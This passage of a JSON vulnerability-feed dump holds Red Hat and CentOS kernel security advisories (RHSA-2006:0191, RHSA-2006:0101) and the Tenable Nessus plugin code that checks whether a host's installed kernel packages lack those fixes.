ISO-9660 file system handling that allowed the\n mounting of an invalid image on a CD-ROM to cause a\n denial of service (crash) or potentially execute\n arbitrary code (CVE-2005-0815, moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\nThe following bugs were also addressed :\n\n - Handle set_brk() errors in binfmt_elf/aout\n\n - Correct error handling in shmem_ioctl\n\n - Correct scsi error return\n\n - Fix netdump time keeping bug\n\n - Fix netdump link-down freeze\n\n - Fix FAT fs deadlock\n\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.", "edition": 26, "published": "2006-02-05T00:00:00", "title": "RHEL 2.1 : kernel (RHSA-2006:0191)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1058", "CVE-2005-0124", "CVE-2005-3275", "CVE-2005-3806", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-0815", "CVE-2005-0400", "CVE-2005-2458", "CVE-2002-2185", "CVE-2004-1073"], "modified": "2006-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-BOOT", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-source", "p-cpe:/a:redhat:enterprise_linux:kernel-summit", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-enterprise"], "id": "REDHAT-RHSA-2006-0191.NASL", "href": "https://www.tenable.com/plugins/nessus/20855", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0191. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20855);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2002-2185\", \"CVE-2004-1058\", \"CVE-2004-1073\", \"CVE-2005-0124\", \"CVE-2005-0400\", \"CVE-2005-0815\", \"CVE-2005-2458\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3180\", \"CVE-2005-3275\", \"CVE-2005-3806\");\n script_xref(name:\"RHSA\", value:\"2006:0191\");\n\n script_name(english:\"RHEL 2.1 : kernel (RHSA-2006:0191)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix a number of security issues as well\nas other bugs are now available for Red Hat Enterprise Linux 2.1 (32\nbit architectures)\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a race condition that allowed local users to read the\n environment variables of another process (CVE-2004-1058,\n low)\n\n - a flaw in the open_exec function of execve that allowed\n a local user to read setuid ELF binaries that should\n otherwise be protected by standard permissions.\n (CVE-2004-1073, moderate). Red Hat originally reported\n this flaw as being fixed by RHSA-2004:504, but a patch\n for this issue was missing from that update.\n\n - a flaw in the coda module that allowed a local user to\n cause a denial of service (crash) or possibly gain\n privileges (CVE-2005-0124, moderate)\n\n - a potential leak of kernel data from ext2 file system\n handling (CVE-2005-0400, low)\n\n - flaws in ISO-9660 file system handling that allowed the\n mounting of an invalid image on a CD-ROM to cause a\n denial of service (crash) or potentially execute\n arbitrary code (CVE-2005-0815, moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\nThe following bugs were also addressed :\n\n - Handle set_brk() errors in binfmt_elf/aout\n\n - Correct error handling in shmem_ioctl\n\n - Correct scsi error return\n\n - Fix netdump time keeping bug\n\n - Fix netdump link-down freeze\n\n - Fix FAT fs deadlock\n\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-2185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0815\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0191\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-BOOT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-enterprise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-summit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/02/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2002-2185\", \"CVE-2004-1058\", \"CVE-2004-1073\", \"CVE-2005-0124\", \"CVE-2005-0400\", \"CVE-2005-0815\", \"CVE-2005-2458\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3180\", \"CVE-2005-3275\", \"CVE-2005-3806\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2006:0191\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0191\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"kernel-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"kernel-debug-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kernel-doc-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"kernel-enterprise-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kernel-headers-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"kernel-smp-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kernel-source-2.4.9-e.68\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"kernel-summit-2.4.9-e.68\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-BOOT / kernel-debug / kernel-doc / etc\");\n }\n}\n", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-06T09:24:54", "description": "Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 4 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw which allowed a local user to write to firmware\n on read-only opened /dev/cdrom devices (CVE-2004-1190,\n moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in the SCSI procfs interface that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-2800, moderate)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a race condition when threads share memory mapping that\n allowed local users to cause a denial of service\n (deadlock) (CVE-2005-3106, important)\n\n - a flaw when trying to mount a non-hfsplus filesystem\n using hfsplus that allowed local users to cause a denial\n of service (crash) (CVE-2005-3109, moderate)\n\n - a minor info leak with the get_thread_area() syscall\n that allowed a local user to view uninitialized kernel\n stack data (CVE-2005-3276, low)\n\n - a flaw in mq_open system call that allowed a local user\n to cause a denial of service (crash) (CVE-2005-3356,\n important)\n\n - a flaw in set_mempolicy that allowed a local user on\n some 64-bit architectures to cause a denial of service\n (crash) (CVE-2005-3358, important)\n\n - a flaw in the auto-reap of child processes that allowed\n a local user to cause a denial of service (crash)\n (CVE-2005-3784, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\n - a flaw in procfs handling that allowed a local user to\n read kernel memory (CVE-2005-4605, important)\n\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.", "edition": 27, "published": "2006-07-05T00:00:00", "title": "CentOS 4 : kernel (CESA-2006:0101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3358", "CVE-2005-3106", "CVE-2005-3858", "CVE-2005-3109", "CVE-2005-3356", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2800", "CVE-2005-4605", "CVE-2004-1190", "CVE-2005-2709", "CVE-2005-3857", "CVE-2005-2458", "CVE-2002-2185", "CVE-2005-3276"], "modified": "2006-07-05T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-hugemem", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:kernel-smp", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-smp-devel", "p-cpe:/a:centos:centos:kernel-hugemem-devel"], "id": "CENTOS_RHSA-2006-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/21977", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0101 and \n# CentOS Errata and Security Advisory 2006:0101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21977);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-2185\", \"CVE-2004-1190\", \"CVE-2005-2458\", \"CVE-2005-2709\", \"CVE-2005-2800\", \"CVE-2005-3044\", \"CVE-2005-3106\", \"CVE-2005-3109\", \"CVE-2005-3276\", \"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3784\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4605\");\n script_xref(name:\"RHSA\", value:\"2006:0101\");\n\n script_name(english:\"CentOS 4 : kernel (CESA-2006:0101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 4 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw which allowed a local user to write to firmware\n on read-only opened /dev/cdrom devices (CVE-2004-1190,\n moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in the SCSI procfs interface that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-2800, moderate)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a race condition when threads share memory mapping that\n allowed local users to cause a denial of service\n (deadlock) (CVE-2005-3106, important)\n\n - a flaw when trying to mount a non-hfsplus filesystem\n using hfsplus that allowed local users to cause a denial\n of service (crash) (CVE-2005-3109, moderate)\n\n - a minor info leak with the get_thread_area() syscall\n that allowed a local user to view uninitialized kernel\n stack data (CVE-2005-3276, low)\n\n - a flaw in mq_open system call that allowed a local user\n to cause a denial of service (crash) (CVE-2005-3356,\n important)\n\n - a flaw in set_mempolicy that allowed a local user on\n some 64-bit architectures to cause a denial of service\n (crash) (CVE-2005-3358, important)\n\n - a flaw in the auto-reap of child processes that allowed\n a local user to cause a denial of service (crash)\n (CVE-2005-3784, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\n - a flaw in procfs handling that allowed a local user to\n read kernel memory (CVE-2005-4605, important)\n\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012580.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4839b252\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012581.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d8112949\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012582.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec839998\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-devel-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-doc-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-doc-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-22.0.2.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-22.0.2.EL\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:05:33", "description": "Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 4 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw which allowed a local user to write to firmware\n on read-only opened /dev/cdrom devices (CVE-2004-1190,\n moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in the SCSI procfs interface that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-2800, moderate)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a race condition when threads share memory mapping that\n allowed local users to cause a denial of service\n (deadlock) (CVE-2005-3106, important)\n\n - a flaw when trying to mount a non-hfsplus filesystem\n using hfsplus that allowed local users to cause a denial\n of service (crash) (CVE-2005-3109, moderate)\n\n - a minor info leak with the get_thread_area() syscall\n that allowed a local user to view uninitialized kernel\n stack data (CVE-2005-3276, low)\n\n - a flaw in mq_open system call that allowed a local user\n to cause a denial of service (crash) (CVE-2005-3356,\n important)\n\n - a flaw in set_mempolicy that allowed a local user on\n some 64-bit architectures to cause a denial of service\n (crash) (CVE-2005-3358, important)\n\n - a flaw in the auto-reap of child processes that allowed\n a local user to cause a denial of service (crash)\n (CVE-2005-3784, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\n - a flaw in procfs handling that allowed a local user to\n read kernel memory (CVE-2005-4605, important)\n\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.", "edition": 28, "published": "2006-01-17T00:00:00", "title": "RHEL 4 : kernel (RHSA-2006:0101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3358", "CVE-2005-3106", "CVE-2005-3858", "CVE-2005-3109", "CVE-2005-3356", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2800", "CVE-2005-4605", "CVE-2004-1190", "CVE-2005-2709", "CVE-2005-3857", "CVE-2005-2458", "CVE-2002-2185", "CVE-2005-3276"], "modified": "2006-01-17T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2006-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/20732", "sourceData": "#%NASL_MIN_LEVEL 